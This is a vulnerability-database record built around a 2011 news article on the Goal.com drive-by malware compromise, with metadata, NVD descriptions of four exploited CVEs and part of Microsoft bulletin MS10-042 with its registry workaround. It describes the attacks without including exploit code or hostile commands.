ID THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7 Type threatpost Reporter Brian Donohue Modified 2013-04-17T20:08:50
Description
Goal.com, a popular football (aka “soccer” for all us Yanks) news site was hacked and found serving malware via drive-by-downloads between April 27 and 28, according to a post by Web security firm Armorize.
In an analysis of the attack, Armorize
researcher Wayne Huang suggests that a hacker specifically targeted and
compromised Goal.com through a back-door that allowed the attacker to
manipulate the site’s content at will. Researchers at Armorize said the attacks appear to be specific to Goal.com, which ranks 379th on Alexa.com’s list of the world’s top Web sites. That suggests the compromise is not part of a mass SQL injection campaign.
According to the report, Goal.com was detected on April 27 and 28, 2011 serving up an iframe
attack that forwarded visitors to a rogue domain in the .cc top level
domain (TLD). That redirect was the first in a chain of events that
resulted in the delivery of a known exploit pack, g01pack that targets
attacks at the specific operating system and browser version the
Goal.com visitor is using. After exploiting the user’s browser, further malware, including a Trojan horse program were downloaded to the victim’s computer.
The
number of users compromised after they visited Goal.com isn’t known.
The site receives anywhere between 215,000 and 232,000 daily unique page
views, according to alexa.com.
As is often the case, the domains used to deliver the malware were not identified by AV products as malicious or blacklisted by Google’s SafeBrowsing feature, a fact that Huang claims fortifies the argument that these are targeted attacks.
According
to the post, Armorize scanners became aware of the attack when the
hacker responsible started testing injections at Goal.com. The browser
exploits used during the test were CVE-2010-1423, a Java vulnerability,
CVE-2010-1885 (Microsoft’s Help Center, as well as CVE-2009-0927 for
PDF, and CVE-2006-0003 affecting Microsoft’s MDAC.
The attacker used the go1pack exploit kit, which has a fake admin page used as a honeynet
for researchers, allowing the attacker to keep track of anyone
attempting to research his work. The exploit codes were also mutated to
avoid further detection.
{"id": "THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7", "type": "threatpost", "bulletinFamily": "info", "title": "Popular Sports Site Goal.com Serves Malware", "description": "[](<https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/>)Goal.com, a popular football (aka \u201csoccer\u201d for all us Yanks) news site was hacked and found serving malware via drive-by-downloads between April 27 and 28, according to a post by Web security firm Armorize.\n\nIn an analysis of the attack, Armorize \nresearcher Wayne Huang suggests that a hacker specifically targeted and \ncompromised Goal.com through a back-door that allowed the attacker to \nmanipulate the site\u2019s content at will. Researchers at Armorize said the attacks appear to be specific to Goal.com, which ranks 379th on Alexa.com\u2019s list of the world\u2019s top Web sites. That suggests the compromise is not part of a mass SQL injection campaign.\n\nAccording to the [report](<http://blog.armorize.com/2011/05/goalcom-serving-malware.html>), Goal.com was detected on April 27 and 28, 2011 serving up an iframe \nattack that forwarded visitors to a rogue domain in the .cc top level \ndomain (TLD). That redirect was the first in a chain of events that \nresulted in the delivery of a known exploit pack, g01pack that targets \nattacks at the specific operating system and browser version the \nGoal.com visitor is using. After exploiting the user\u2019s browser, further malware, including a Trojan horse program were downloaded to the victim\u2019s computer. \n\nThe \nnumber of users compromised after they visited Goal.com isn\u2019t known. \nThe site receives anywhere between 215,000 and 232,000 daily unique page \nviews, according to [alexa.com](<http://www.alexa.com/siteinfo/goal.com>).\n\nAs is often the case, the domains used to deliver the malware were not identified by AV products as malicious or blacklisted by Google\u2019s SafeBrowsing feature, a fact that Huang claims fortifies the argument that these are targeted attacks.\n\nAccording \nto the post, Armorize scanners became aware of the attack when the \nhacker responsible started testing injections at Goal.com. The browser \nexploits used during the test were CVE-2010-1423, a Java vulnerability, \nCVE-2010-1885 (Microsoft\u2019s Help Center, as well as CVE-2009-0927 for \nPDF, and CVE-2006-0003 affecting Microsoft\u2019s MDAC.\n\nThe attacker used the go1pack exploit kit, which has a fake admin page used as a honeynet \nfor researchers, allowing the attacker to keep track of anyone \nattempting to research his work. The exploit codes were also mutated to \navoid further detection.\n\nAttacks such as this one represent a trend in malware distribution. Security researchers have noted for some time that reputable Web sites are [high value targets for online scammers](<https://threatpost.com/legitimate-sites-fertile-ground-malware-091509/>), who want to take advantage of their large visitor traffic and high search engine ranking. In February, 2010, Kaspersky Lab researchers reported that [one in every 150 legitimate Web sites was hosting malicious content,](<https://threatpost.com/one-every-150-legitimate-sites-infected-malware-020310/>) [leveraging holes ](<https://threatpost.com/hartford-hacked-040711/>)in [legitimate sites](<https://threatpost.com/education-goverment-sites-still-serving-scammers-months-later-041411/>) to [push malware to their unsuspecting guests](<https://threatpost.com/malicious-ads-serving-malware-spotify-users-032511/>).\n", "published": "2011-05-03T19:05:02", "modified": "2013-04-17T20:08:50", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/75196/", "reporter": "Brian Donohue", "references": ["https://threatpost.com/popular-sports-site-goalcom-serves-malware-050311/", "http://blog.armorize.com/2011/05/goalcom-serving-malware.html", "http://www.alexa.com/siteinfo/goal.com", "https://threatpost.com/legitimate-sites-fertile-ground-malware-091509/", "https://threatpost.com/one-every-150-legitimate-sites-infected-malware-020310/", "https://threatpost.com/hartford-hacked-040711/", "https://threatpost.com/education-goverment-sites-still-serving-scammers-months-later-041411/", "https://threatpost.com/malicious-ads-serving-malware-spotify-users-032511/"], "cvelist": ["CVE-2006-0003", "CVE-2009-0927", "CVE-2010-1423", "CVE-2010-1885"], "lastseen": "2018-10-06T23:05:40", "viewCount": 16, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2018-10-06T23:05:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1885", "CVE-2010-1423", "CVE-2009-0927", "CVE-2006-0003"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21522", "SECURITYVULNS:VULN:9687", "SECURITYVULNS:DOC:22414", "SECURITYVULNS:DOC:12171", "SECURITYVULNS:DOC:24211", "SECURITYVULNS:VULN:10990", "SECURITYVULNS:DOC:12167"]}, {"type": "exploitdb", "idList": ["EDB-ID:13808", "EDB-ID:41700", "EDB-ID:16561", "EDB-ID:16681", "EDB-ID:2052", "EDB-ID:8595", "EDB-ID:2164", "EDB-ID:16545", "EDB-ID:16606", "EDB-ID:9579"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:90666", "PACKETSTORM:83139", "PACKETSTORM:91768"]}, {"type": "saint", "idList": ["SAINT:3B46CFB2D4C3EBFC228A16FC6CC49E11", "SAINT:654B00AF52A01A1D29119E4E92043279", "SAINT:500F83833D8CE812FA9B6A3B0F45786C", "SAINT:BC1DB9AB9516112650D9CE49519F32F1", "SAINT:3FD55356C59C08B007A70159ACFB7A63", "SAINT:191E4D213693C8769F03A620EE4E529A", "SAINT:D7F75EFDCAC463A90F06C660FBFD2D10", "SAINT:AFE3E3BE3BB3652683F3F01263CCE593", "SAINT:F159D63C4ABD84C60A4DEC50BD8A348D"]}, {"type": "canvas", "idList": ["ACROBAT_JS4", "MS06_014", "IE_HCP"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A99632279EAE4DA17D8EAF0E27E2511B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/JAVA_WS_ARGINJECT_ALTJVM", "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CREATEOBJECT", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_GETICON", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_GETICON", "MSF:EXPLOIT/WINDOWS/BROWSER/MS10_042_HELPCTR_XSS_CMD_EXEC"]}, {"type": "threatpost", "idList": ["THREATPOST:E9568A3F1CFF6C7EDB6D4B331F03DE44", "THREATPOST:53F6ADA586C083C4B07DDECFA9D7DBEC", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "THREATPOST:A0E12A73898C41CD87CEBAD62A9C9D5A", "THREATPOST:54BD46D26E60C736B5EB67F44EEE5663", "THREATPOST:DE77BAF68D70679BE8D4A89B70866EAE", "THREATPOST:FE658F4ABA395F21FF2AF66D61DC66E5", "THREATPOST:F74B2BA1E612E4169F1938346DB9CC35", "THREATPOST:1B37290C48B43298A5C4751356F68B70", "THREATPOST:988117842525F1F414002817E6166A11", "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "THREATPOST:243FAEE6E3B441A3C58FD1A9BF0E6A2D", "THREATPOST:3FB81B2E60BAB8571BCB0604A1CE12FF", "THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7", "THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524"]}, {"type": "seebug", "idList": ["SSV:12196", "SSV:66863", "SSV:19788"]}, {"type": "openvas", "idList": ["OPENVAS:902167", "OPENVAS:801358", "OPENVAS:1361412562310902080", "OPENVAS:136141256231063853", "OPENVAS:1361412562310900320", "OPENVAS:902080", "OPENVAS:1361412562310902167", "OPENVAS:1361412562310801358", "OPENVAS:1361412562310900321", "OPENVAS:1361412562310902168"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200904-17.NASL", "SMB_NT_MS06-014.NASL", "ADOBE_ACROBAT_91.NASL", "SMB_KB_2219475.NASL", "SMB_NT_MS10-042.NASL", "ADOBE_READER_91.NASL", "SUSE_11_1_ACROREAD-090325.NASL", "ORACLE_JAVA6_UPDATE20.NASL", "SUSE_11_ACROREAD-090325.NASL", "ORACLE_JAVA6_UPDATE20_UNIX.NASL"]}, {"type": "symantec", "idList": ["SMNTC-34169"]}, {"type": "zdi", "idList": ["ZDI-09-014"]}, {"type": "osvdb", "idList": ["OSVDB:24517"]}, {"type": "cert", "idList": ["VU:234812"]}, {"type": "gentoo", "idList": ["GLSA-200904-17"]}, {"type": "suse", "idList": ["SUSE-SA:2009:014"]}, {"type": "redhat", "idList": ["RHSA-2008:0974"]}], "modified": "2018-10-06T23:05:40", "rev": 2}, "vulnersScore": 7.1}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:44:58", "description": "The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka \"Help Center URL Validation Vulnerability.\"\nPer: http://blogs.technet.com/b/msrc/archive/2010/06/10/windows-help-vulnerability-disclosure.aspx\r\n\r\n\"customers running Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, are not vulnerable to this issue, or at risk of attack.\"", "edition": 4, "cvss3": {}, "published": "2010-06-15T14:04:00", "title": "CVE-2010-1885", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1885"], "modified": "2019-02-26T14:04:00", "cpe": ["cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:microsoft:windows_2003_server:*", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2010-1885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1885", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_xp:-:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:*:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:00", "description": "Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.\nPer vendor advisory in the 'details' section it states:\n\n\"The Adobe Reader and Acrobat 9.1 and 7.1.1 updates resolve an input validation issue in a JavaScript method that could potentially lead to remote code execution. This issue has already been resolved in Adobe Reader 8.1.3 and Acrobat 8.1.3. (CVE-2009-0927)\"\n\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html", "edition": 6, "cvss3": {}, "published": "2009-03-19T10:30:00", "title": "CVE-2009-0927", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0927"], "modified": "2018-11-08T20:25:00", "cpe": [], "id": "CVE-2009-0927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0927", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T05:44:57", "description": "Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.", "edition": 6, "cvss3": {}, "published": "2010-04-15T21:30:00", "title": "CVE-2010-1423", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1423"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:oracle:jre:1.6.0", "cpe:/a:oracle:jdk:1.6.0"], "id": "CVE-2010-1423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1423", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update_19:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:17", "description": "Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors.", "edition": 4, "cvss3": {}, "published": "2006-04-12T00:02:00", "title": "CVE-2006-0003", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-0003"], "modified": "2018-10-19T15:41:00", "cpe": ["cpe:/a:microsoft:data_access_components:2.5", "cpe:/a:microsoft:data_access_components:2.7", "cpe:/a:microsoft:data_access_components:2.8"], "id": "CVE-2006-0003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0003", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:data_access_components:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:data_access_components:2.8:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:data_access_components:2.7:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:data_access_components:2.8:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:data_access_components:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:data_access_components:2.5:sp3:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-0927"], "description": "Hi everyone,\r\n\r\nI published some work I did concerning the adobe reader Collab.getIcon()\r\nbuffer overflow. You can find the package (exploit/report/payload) on:\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\n\r\nCheers,\r\n\r\n\r\nIvan Rodriguez Almuina\r\nkralor - [HiC] && [Crpt]\r\n", "edition": 1, "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "SECURITYVULNS:DOC:22414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22414", "title": "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Exploit and Report (CVE-2009-0927)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-1885"], "description": "Code injection via URL.", "edition": 1, "modified": "2010-07-14T00:00:00", "published": "2010-07-14T00:00:00", "id": "SECURITYVULNS:VULN:10990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10990", "title": "Microsoft Windows Help and Support Center code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1885"], "description": "Microsoft Security Bulletin MS10-042 - Critical\r\nVulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)\r\nPublished: July 13, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves a publicly disclosed vulnerability in the Windows Help and Support Center feature that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. The vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must click a link listed within an e-mail message.\r\n\r\nThis security update is rated Critical for all supported editions of Windows XP, and Low for all supported editions of Windows Server 2003. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerability by modifying the manner in which data is validated when passed to the Windows Help and Support Center. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update also addresses the vulnerability first described in Microsoft Security Advisory 2219475.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nNone\r\n\r\nNon-Affected Software\r\nOperating System\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\r\nWindows Vista Service Pack 1 and Windows Vista Service Pack 2\r\n\r\nWindows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\r\nWindows 7 for 32-bit Systems\r\n\r\nWindows 7 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for x64-based Systems\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the July bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tHelp Center URL Validation Vulnerability - CVE-2010-1885\tAggregate Severity Rating\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nLow \r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nLow \r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nLow \r\nRemote Code Execution\r\n\t\r\n\r\nLow\r\nTop of sectionTop of section\r\n\t\r\nHelp Center URL Validation Vulnerability - CVE-2010-1885\r\n\r\nAn unauthenticated remote code execution vulnerability exists in the way that the Microsoft Help and Support Center validates specially crafted URLs. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-1885.\r\n\t\r\nMitigating Factors for Help Center URL Validation Vulnerability - CVE-2010-1885\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must click a link listed within an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Help Center URL Validation Vulnerability - CVE-2010-1885\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nUnregister the HCP Protocol\r\n\r\nNote See Microsoft Knowledge Base Article 2229593 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\nUnregistering the HCP Protocol prevents this issue from being exploited on affected systems.\r\n\r\nUsing the Interactive Method\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK\r\n\r\n2.\r\n\t\r\n\r\nLocate and then click the following registry key:\r\n\r\nHKEY_CLASSES_ROOT\HCP\r\n\r\n3.\r\n\t\r\n\r\nClick the File menu and select Export\r\n\r\n4.\r\n\t\r\n\r\nIn the Export Registry File dialog box, enter HCP_Procotol_Backup.reg and click Save.\r\n\r\nNote This will create a backup of this registry key in the My Documents folder by default.\r\n\r\n5.\r\n\t\r\n\r\nPress the Delete key on the keyboard to delete the registry key. When prompted to delete the registry key via the Confirm Key Delete dialog box, click Yes.\r\n\r\nUsing a Managed Deployment Script\r\n\r\n1.\r\n\t\r\n\r\nCreate a backup copy of the registry keys by using a managed deployment script that contains the following commands:\r\n\r\nRegedit.exe /e HCP_Protocol_Backup.reg HKEY_CLASSES_ROOT\HCP\r\n\r\n2.\r\n\t\r\n\r\nNext, save the following to a file with a .REG extension, such as Disable_HCP_Protocol.reg:\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[-HKEY_CLASSES_ROOT\HCP]\r\n\r\n3.\r\n\t\r\n\r\nRun the above registry script on the target machine with the following command from an elevated command prompt:\r\n\r\nRegedit.exe /s Disable_HCP_Protocol.reg\r\n\r\nImpact of Workaround: Unregistering the HCP protocol will break all local, legitimate help links that use hcp://. For example, links in Control Panel may no longer work.\r\n\r\nHow to undo the workaround\r\n\r\nUsing the interactive method\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type Regedit in the Open box, and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nClick the File menu and select Import.\r\n\r\n3.\r\n\t\r\n\r\nIn the Import Registry File dialog box, select HCP_Procotol_Backup.reg and click Open.\r\n\r\nUsing a Managed Deployment Script\r\n\u2022\t\r\n\r\nRestore the original state by running the following command:\r\n\r\nRegedit.exe /s HCP_Protocol_Backup.reg\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Help Center URL Validation Vulnerability - CVE-2010-1885\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe Windows Help and Support Center does not properly validate URLs when using the HCP Protocol.\r\n\r\nWhat is the Help and Support Center? \r\nHelp and Support Center (HSC) is a feature in Windows that provides help on a variety of topics. For instance, HSC enables users to learn about Windows features, download and install software updates, determine whether a particular hardware device is compatible with Windows, get assistance from Microsoft, and so forth. Users and programs can execute URL links to Help and Support Center by using the "hcp://" prefix in a URL link.\r\n\r\nWhat is the HCP Protocol? \r\nSimilar to the HTTP protocol which is used to execute URL links to open a Web browser, the HCP 